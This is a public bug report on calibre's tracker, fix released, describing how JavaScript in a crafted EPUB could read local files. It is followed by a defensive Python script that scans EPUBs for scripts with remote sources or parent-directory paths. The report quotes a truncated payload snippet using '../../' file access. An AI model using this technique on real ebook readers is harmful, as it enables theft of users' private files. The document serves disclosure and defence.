Local file access through javascript in epub View
Bug #1651728 reported by Jędrzej
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
calibre | Fix Released | Undecided | Unassigned |
Bug Description
Hello,
Calibre can access local files using JavaScript in an EPUB file.
Code snippet:
<script src="https:/
<script>
$.getScript( "../../
});
</script>
An attacker can steal any of the victim's files and send them to a server.
Tested on: Mac, I think it will work on any OS
Version: 2.74.0
Information type: Private Security → Public Security
Crafted epub file.
Payload on page 3
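
A defensive triage check for the behaviour reported above, added here as an example (not code from the report or from calibre): it lists every script element in an EPUB's content documents and flags remote script sources and inline scripts that contain `../`. The names `ScriptFinder`, `scan_epub` and `build_sample`, and the sample archive with its placeholder URL and path, are constructed for illustration.

```python
import io
import zipfile
from html.parser import HTMLParser


class ScriptFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, detail) tuples for one content document
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src") or ""
            if src:
                remote = src.lower().startswith(("http://", "https://", "//"))
                self.findings.append(("remote-script" if remote else "bundled-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script text; a "../" inside it is worth a closer look.
        if self._in_script and data.strip():
            kind = "inline-parent-path" if "../" in data else "inline-script"
            self.findings.append((kind, data.strip()[:40]))


def scan_epub(data):
    """Map each content document in an EPUB (given as bytes) to its script findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xhtml", ".html", ".htm")):
                finder = ScriptFinder()
                finder.feed(zf.read(name).decode("utf-8", "replace"))
                if finder.findings:
                    report[name] = finder.findings
    return report


def build_sample():  # constructed archive; the URL and path are placeholders
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("OEBPS/page1.xhtml", "<html><body><p>Text</p></body></html>")
        zf.writestr("OEBPS/page3.xhtml", '<script src="https://example.invalid/lib.js"></script>'
                    '<script>load("../../PLACEHOLDER");</script>')
    return buf.getvalue()
```

Calling `scan_epub(open(path, "rb").read())` on a book before opening it in a reader gives a per-document list of script findings; documents without script elements are left out of the report.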